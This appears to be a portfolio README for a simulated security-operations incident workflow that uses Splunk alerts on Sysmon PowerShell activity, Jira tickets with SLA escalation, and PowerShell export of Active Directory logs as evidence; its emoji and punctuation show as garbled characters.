IT Ops Incident Workflow Simulation
π Overview
This project demonstrates a full incident workflow simulation designed to mirror real SOC operations. Using Splunk, Jira, and PowerShell, I built an end-to-end pipeline to detect malicious activity, create incidents, enforce SLAs, and export evidence β just like a Security Engineer or SOC Analyst would in an enterprise environment.
βοΈ Key Features
Detection (Splunk): Ingested Sysmon logs and triggered alerts on suspicious PowerShell activity.
Triage (Jira): Auto/manual ticket creation with SLA timers and priority escalation.
SLA Enforcement: Escalation rules activate when SLA targets are breached.
Evidence (PowerShell): Automated Active Directory change log export, attached to Jira tickets.
Workflow Diagram: Visual representation of detection β ticketing β SLA β escalation β evidence.
π― Why It Matters
In real-world SOCs, analysts donβt just spot alerts β they manage the entire incident lifecycle:
Configuring SIEM detections to spot malicious behavior.
Tracking and prioritizing incidents with SLAs.
Handling escalations when issues arenβt resolved in time.
Collecting evidence for compliance and audit.
This project shows I can design, document, and execute these workflows using free tools β proving hands-on skills that map directly to SOC Analyst and Security Engineer roles.
π Project Resources
πΌοΈ Workflow Diagram included in README
π Setup Instructions for reproducibility
βοΈ Scripts & sample artifacts included
